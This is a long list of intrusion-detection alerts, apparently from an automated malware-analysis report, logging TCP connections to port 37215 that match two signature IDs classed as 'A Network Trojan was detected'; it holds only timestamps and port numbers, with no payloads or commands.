          Timestamp:05/28/24-14:47:32.550560
          SID:2835222
          Source Port:47566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.082533
          SID:2835222
          Source Port:35286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.478296
          SID:2835222
          Source Port:56906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.220654
          SID:2829579
          Source Port:37620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138107
          SID:2835222
          Source Port:54002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239193
          SID:2835222
          Source Port:59030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177517
          SID:2829579
          Source Port:44122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.160715
          SID:2829579
          Source Port:60106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209040
          SID:2829579
          Source Port:40032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778442
          SID:2829579
          Source Port:49180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475621
          SID:2829579
          Source Port:44734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907757
          SID:2835222
          Source Port:41308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177240
          SID:2829579
          Source Port:41914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.091585
          SID:2829579
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738471
          SID:2835222
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.496970
          SID:2829579
          Source Port:42136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.091053
          SID:2835222
          Source Port:38006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195736
          SID:2829579
          Source Port:35420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093747
          SID:2835222
          Source Port:59010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115483
          SID:2835222
          Source Port:34408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.285876
          SID:2829579
          Source Port:59740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317228
          SID:2829579
          Source Port:60162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797102
          SID:2835222
          Source Port:49344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068579
          SID:2835222
          Source Port:35498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271945
          SID:2835222
          Source Port:59280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685934
          SID:2829579
          Source Port:52462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161193
          SID:2835222
          Source Port:50148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988984
          SID:2829579
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678311
          SID:2835222
          Source Port:43162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.156287
          SID:2829579
          Source Port:46438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.115936
          SID:2829579
          Source Port:58356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.513714
          SID:2829579
          Source Port:52270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992134
          SID:2829579
          Source Port:37840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324574
          SID:2835222
          Source Port:59848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560515
          SID:2835222
          Source Port:37242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466445
          SID:2829579
          Source Port:48996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.812391
          SID:2829579
          Source Port:58470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.685041
          SID:2835222
          Source Port:41444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322017
          SID:2829579
          Source Port:58094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033400
          SID:2829579
          Source Port:54506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535106
          SID:2835222
          Source Port:49488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214844
          SID:2829579
          Source Port:48552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044279
          SID:2829579
          Source Port:49436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941603
          SID:2835222
          Source Port:39370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466284
          SID:2835222
          Source Port:60166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711023
          SID:2829579
          Source Port:42440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239408
          SID:2829579
          Source Port:41890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868559
          SID:2835222
          Source Port:43166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273185
          SID:2835222
          Source Port:41850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210741
          SID:2829579
          Source Port:52666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943475
          SID:2829579
          Source Port:41298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325817
          SID:2835222
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.154059
          SID:2829579
          Source Port:42698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270851
          SID:2835222
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.794629
          SID:2835222
          Source Port:42482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962849
          SID:2829579
          Source Port:45712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103252
          SID:2835222
          Source Port:35484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067288
          SID:2835222
          Source Port:39804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726605
          SID:2829579
          Source Port:56734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923131
          SID:2829579
          Source Port:54896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196177
          SID:2835222
          Source Port:46102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.838766
          SID:2829579
          Source Port:32830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065400
          SID:2835222
          Source Port:50980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.498921
          SID:2835222
          Source Port:57020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528846
          SID:2829579
          Source Port:44954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299663
          SID:2835222
          Source Port:44016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.774269
          SID:2835222
          Source Port:53152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062838
          SID:2829579
          Source Port:43944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560506
          SID:2829579
          Source Port:57982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855193
          SID:2829579
          Source Port:45162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466385
          SID:2829579
          Source Port:51068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.080600
          SID:2829579
          Source Port:33360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724530
          SID:2829579
          Source Port:44518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922913
          SID:2835222
          Source Port:52686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.665476
          SID:2835222
          Source Port:52972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.914228
          SID:2829579
          Source Port:37038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.154587
          SID:2835222
          Source Port:40364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465232
          SID:2835222
          Source Port:49722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210657
          SID:2835222
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698599
          SID:2835222
          Source Port:52818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160556
          SID:2835222
          Source Port:47518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.185883
          SID:2829579
          Source Port:39306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.915191
          SID:2829579
          Source Port:58580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876306
          SID:2829579
          Source Port:42638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.595038
          SID:2829579
          Source Port:58408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.065731
          SID:2835222
          Source Port:38930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.526472
          SID:2835222
          Source Port:33522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301341
          SID:2835222
          Source Port:49562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.659029
          SID:2835222
          Source Port:52916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.631805
          SID:2835222
          Source Port:59616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763605
          SID:2829579
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.084802
          SID:2829579
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.372164
          SID:2835222
          Source Port:35816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.976698
          SID:2835222
          Source Port:56394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117123
          SID:2835222
          Source Port:57320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.048716
          SID:2835222
          Source Port:45202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267196
          SID:2835222
          Source Port:58734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.233126
          SID:2835222
          Source Port:45680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.325704
          SID:2835222
          Source Port:44410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.352450
          SID:2835222
          Source Port:48920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.960884
          SID:2835222
          Source Port:42056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877688
          SID:2829579
          Source Port:55036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324593
          SID:2835222
          Source Port:46906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.287637
          SID:2829579
          Source Port:56612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.474886
          SID:2829579
          Source Port:53788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538773
          SID:2829579
          Source Port:38696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473720
          SID:2829579
          Source Port:50444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946839
          SID:2829579
          Source Port:52204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.348770
          SID:2829579
          Source Port:33434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234645
          SID:2829579
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.976071
          SID:2829579
          Source Port:49694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402878
          SID:2829579
          Source Port:50880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.493090
          SID:2835222
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548475
          SID:2835222
          Source Port:34354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301307
          SID:2835222
          Source Port:42052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.988619
          SID:2829579
          Source Port:58442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711552
          SID:2829579
          Source Port:39016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324663
          SID:2829579
          Source Port:35586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147381
          SID:2829579
          Source Port:60140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.653033
          SID:2829579
          Source Port:51082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066577
          SID:2829579
          Source Port:48496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598762
          SID:2835222
          Source Port:35766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729325
          SID:2835222
          Source Port:59970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892545
          SID:2835222
          Source Port:47764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.929150
          SID:2835222
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.993716
          SID:2829579
          Source Port:33974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.176429
          SID:2835222
          Source Port:57062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298545
          SID:2829579
          Source Port:57130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.974035
          SID:2835222
          Source Port:52136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.760612
          SID:2835222
          Source Port:47314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.609545
          SID:2829579
          Source Port:52536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707959
          SID:2835222
          Source Port:57976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803184
          SID:2835222
          Source Port:36696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.851560
          SID:2829579
          Source Port:49200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112815
          SID:2835222
          Source Port:60446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.700444
          SID:2835222
          Source Port:55800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.178869
          SID:2829579
          Source Port:54850
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.225774
          SID:2835222
          Source Port:38748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322260
          SID:2829579
          Source Port:58754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269835
          SID:2829579
          Source Port:49784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975199
          SID:2829579
          Source Port:44712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.379287
          SID:2835222
          Source Port:54600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652296
          SID:2829579
          Source Port:33878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044576
          SID:2835222
          Source Port:52256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.171648
          SID:2829579
          Source Port:56032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463498
          SID:2835222
          Source Port:58838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.327870
          SID:2829579
          Source Port:47868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271477
          SID:2835222
          Source Port:51558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.628695
          SID:2829579
          Source Port:44172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147289
          SID:2835222
          Source Port:37840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266635
          SID:2835222
          Source Port:36314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.727993
          SID:2829579
          Source Port:42722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465301
          SID:2835222
          Source Port:51954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226497
          SID:2835222
          Source Port:38996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.325949
          SID:2829579
          Source Port:39580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840505
          SID:2829579
          Source Port:46244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470864
          SID:2835222
          Source Port:58768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272709
          SID:2835222
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140253
          SID:2835222
          Source Port:41988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806614
          SID:2835222
          Source Port:45016
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.957916
          SID:2829579
          Source Port:39018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102788
          SID:2835222
          Source Port:56486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090671
          SID:2835222
          Source Port:44634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401267
          SID:2835222
          Source Port:46624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.126658
          SID:2835222
          Source Port:45822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890319
          SID:2835222
          Source Port:45478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332290
          SID:2835222
          Source Port:34032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.425809
          SID:2835222
          Source Port:48668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708477
          SID:2829579
          Source Port:42376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891759
          SID:2829579
          Source Port:44926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.511229
          SID:2835222
          Source Port:37216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301294
          SID:2829579
          Source Port:49198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.964397
          SID:2829579
          Source Port:47670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.487457
          SID:2829579
          Source Port:50694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.300650
          SID:2835222
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430221
          SID:2835222
          Source Port:60266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.305674
          SID:2835222
          Source Port:47580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338507
          SID:2835222
          Source Port:45114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.271668
          SID:2835222
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230156
          SID:2829579
          Source Port:45002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270626
          SID:2829579
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497768
          SID:2835222
          Source Port:42472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978888
          SID:2835222
          Source Port:59770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.598657
          SID:2829579
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280346
          SID:2835222
          Source Port:44022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605102
          SID:2835222
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.657156
          SID:2829579
          Source Port:39206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.147650
          SID:2829579
          Source Port:48484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710912
          SID:2829579
          Source Port:53818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.177117
          SID:2835222
          Source Port:39334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778186
          SID:2835222
          Source Port:50612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.224256
          SID:2829579
          Source Port:57296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217792
          SID:2835222
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778784
          SID:2829579
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.088044
          SID:2835222
          Source Port:42906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.008783
          SID:2829579
          Source Port:46028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744907
          SID:2829579
          Source Port:59066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267813
